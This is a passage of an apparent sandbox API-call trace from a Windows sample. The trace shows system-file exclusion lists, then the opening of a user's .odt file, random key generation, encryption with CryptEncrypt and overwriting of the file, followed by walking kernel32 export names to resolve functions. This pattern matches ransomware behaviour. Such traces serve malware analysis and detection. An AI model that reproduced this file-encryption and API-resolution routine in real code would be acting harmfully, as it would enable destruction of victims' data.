(lpString1="1v9OFDiJWPm8MHHQ.odt", lpString2="desktop.ini") returned -1 [0076.590] lstrcmpiW (lpString1="1v9OFDiJWPm8MHHQ.odt", lpString2="ntuser.dat") returned -1 [0076.590] lstrcmpiW (lpString1="1v9OFDiJWPm8MHHQ.odt", lpString2="iconcache.db") returned -1 [0076.590] lstrcmpiW (lpString1="1v9OFDiJWPm8MHHQ.odt", lpString2="bootsect.bak") returned -1 [0076.591] lstrcmpiW (lpString1="1v9OFDiJWPm8MHHQ.odt", lpString2="ntuser.dat.log") returned -1 [0076.591] lstrcmpiW (lpString1="1v9OFDiJWPm8MHHQ.odt", lpString2="thumbs.db") returned -1 [0076.591] lstrcmpiW (lpString1="1v9OFDiJWPm8MHHQ.odt", lpString2="Bootfont.bin") returned -1 [0076.591] lstrlenW (lpString="1v9OFDiJWPm8MHHQ.odt") returned 20 [0076.591] lstrcmpiW (lpString1="odt", lpString2="lnk") returned 1 [0076.591] lstrcmpiW (lpString1="odt", lpString2="exe") returned 1 [0076.591] lstrcmpiW (lpString1="odt", lpString2="sys") returned -1 [0076.591] lstrcmpiW (lpString1="odt", lpString2="dll") returned 1 [0076.591] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0076.591] lstrlenW (lpString="1v9OFDiJWPm8MHHQ.odt") returned 20 [0076.591] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0076.591] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="1v9OFDiJWPm8MHHQ.odt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1v9OFDiJWPm8MHHQ.odt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1v9OFDiJWPm8MHHQ.odt" [0076.591] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.591] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1v9OFDiJWPm8MHHQ.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\1v9ofdijwpm8mhhq.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0076.591] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=15206) returned 1 [0076.591] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0076.591] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0076.592] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0076.592] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0076.592] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0076.592] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0076.592] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0076.593] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.593] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0076.594] CloseHandle (hObject=0x444) returned 1 [0076.594] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.594] WriteFile (in: hFile=0x440, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0076.594] CloseHandle (hObject=0x0) returned 0 [0076.594] CloseHandle (hObject=0x440) returned 1 [0076.595] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.595] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.596] GetTickCount () returned 0x114ba99 [0076.596] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.596] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0076.596] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0076.596] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0076.596] lstrlenA (lpString="kernel32.dll") returned 12 [0076.597] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0076.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0076.597] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0076.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0076.597] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0076.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0076.597] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0076.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0076.597] lstrlenA (lpString="ADDATOMA") returned 8 [0076.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0076.597] lstrlenA (lpString="ADDATOMW") returned 8 [0076.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0076.597] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0076.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0076.597] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0076.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0076.597] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0076.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0076.597] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0076.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0076.597] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0076.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0076.597] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0076.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0076.597] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0076.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0076.597] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0076.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0076.597] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0076.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0076.598] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0076.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0076.598] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0076.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0076.598] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0076.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0076.598] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0076.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0076.598] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0076.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0076.598] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0076.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0076.598] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0076.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0076.598] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0076.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0076.598] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0076.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0076.598] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0076.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0076.598] lstrlenA (lpString="BACKUPREAD") returned 10 [0076.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0076.598] lstrlenA (lpString="BACKUPSEEK") returned 10 [0076.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0076.598] lstrlenA (lpString="BACKUPWRITE") returned 11 [0076.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0076.598] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0076.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0076.598] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0076.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0076.598] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0076.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0076.598] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0076.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0076.598] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0076.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0076.599] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0076.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0076.599] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0076.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0076.599] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0076.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0076.599] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0076.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0076.599] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0076.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0076.599] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0076.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0076.599] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0076.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0076.599] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0076.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0076.599] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0076.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0076.599] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0076.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0076.599] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0076.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0076.599] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0076.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0076.599] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0076.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0076.599] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0076.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0076.599] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0076.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0076.599] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0076.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0076.599] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0076.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0076.600] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0076.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0076.600] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0076.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0076.600] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0076.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0076.600] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0076.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0076.600] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0076.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0076.600] lstrlenA (lpString="BEEP") returned 4 [0076.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0076.600] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0076.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0076.600] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0076.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0076.600] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0076.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0076.600] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0076.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0076.600] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0076.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0076.600] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0076.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0076.600] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0076.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0076.600] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0076.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0076.600] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0076.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0076.600] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0076.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0076.600] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0076.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0076.601] lstrlenA (lpString="CANCELIO") returned 8 [0076.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0076.601] lstrlenA (lpString="CANCELIOEX") returned 10 [0076.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0076.601] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0076.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0076.601] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0076.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0076.601] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0076.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0076.601] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0076.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0076.601] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0076.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0076.601] lstrlenA (lpString="CHECKELEVATION") returned 14 [0076.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0076.601] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0076.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0076.601] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0076.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0076.601] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0076.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0076.601] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0076.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0076.601] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0076.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0076.601] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0076.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0076.601] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0076.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0076.601] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0076.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0076.601] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0076.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0076.601] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0076.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0076.602] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0076.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0076.602] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0076.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0076.602] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0076.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0076.602] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0076.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0076.602] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0076.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0076.602] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0076.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0076.602] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0076.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0076.602] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0076.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0076.602] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0076.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0076.602] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0076.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0076.602] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0076.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0076.602] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0076.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0076.602] 